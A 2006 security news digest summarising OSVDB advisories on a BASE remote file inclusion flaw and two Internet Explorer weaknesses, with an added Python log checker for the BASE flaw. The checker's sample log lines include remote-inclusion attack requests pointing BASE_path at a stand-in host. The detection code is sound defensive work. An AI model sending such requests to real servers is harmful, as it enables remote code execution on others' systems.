Network Security News – Sunday, May 28, 2006 Events
Basic Analysis and Security Engine (BASE) BASE_path Variable Remote File Inclusion
Basic Analysis and Security Engine (BASE) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to "base_qry_common.php", "base_stat_common.php" and "includes/base_include.inc.php" not properly sanitizing user input supplied to the "BASE_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands, which will then be executed by the vulnerable script. Read more at osvdb.org/25770
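A log check for the condition described above, added here as an illustration and not taken from OSVDB or the BASE project: it flags requests to the three named scripts whose "BASE_path" query parameter is a URL rather than a local directory. The combined-log request format, the function names and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts the advisory names as using BASE_path without sanitizing it.
AFFECTED = ("base_qry_common.php", "base_stat_common.php",
            "includes/base_include.inc.php")
# A legitimate BASE_path is a local directory; a leading scheme means the
# include would be resolved against another host.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_base_path(log_line):
    """Return the decoded BASE_path value if it looks like a URL, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(AFFECTED):
        return None
    # parse_qsl percent-decodes, so encoded "http%3A%2F%2F" is caught too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "BASE_path" and SCHEME.match(value):
            return value
    return None

def flagged(lines):
    """Return (client address, BASE_path value) for every suspicious line."""
    hits = []
    for line in lines:
        value = suspicious_base_path(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

# Constructed sample lines; addresses and hosts are documentation values.
SAMPLE = [
    '203.0.113.7 - - [28/May/2006:10:01:02 +0000] "GET /base/base_qry_common.php?BASE_path=http://files.example.test/x.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/May/2006:10:01:09 +0000] "GET /base/includes/base_include.inc.php?BASE_path=hTTp%3A%2F%2Ffiles.example.test%2Fx HTTP/1.0" 200 87',
    '198.51.100.4 - - [28/May/2006:10:02:40 +0000] "GET /base/base_stat_common.php?BASE_path=/var/www/base/ HTTP/1.1" 200 1033',
    '198.51.100.4 - - [28/May/2006:10:02:41 +0000] "GET /base/base_main.php HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for client, value in flagged(SAMPLE):
        print(f"{client} supplied remote BASE_path: {value}")
```

Only the query string is inspected, so a value supplied in a POST body or cookie will not appear in an access log and needs a separate check.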
Microsoft IE Iframe Folder Delete Weakness
Microsoft IE contains a flaw that may allow a malicious user to trick users into performing certain actions on local resources. The issue is triggered when network shares are included in an iframe. It is possible that the flaw may allow an attacker to trick users into performing certain actions on local folders and files, resulting in a loss of confidentiality. Read more at osvdb.org/23608
Microsoft IE window.status Memory Leak DoS
Microsoft IE contains a flaw that may allow a remote denial of service. The issue is triggered by a memory leak when the victim accesses a URL that contains malicious code that calls the window.status function, and will result in loss of availability for the platform. Read more at osvdb.org/23307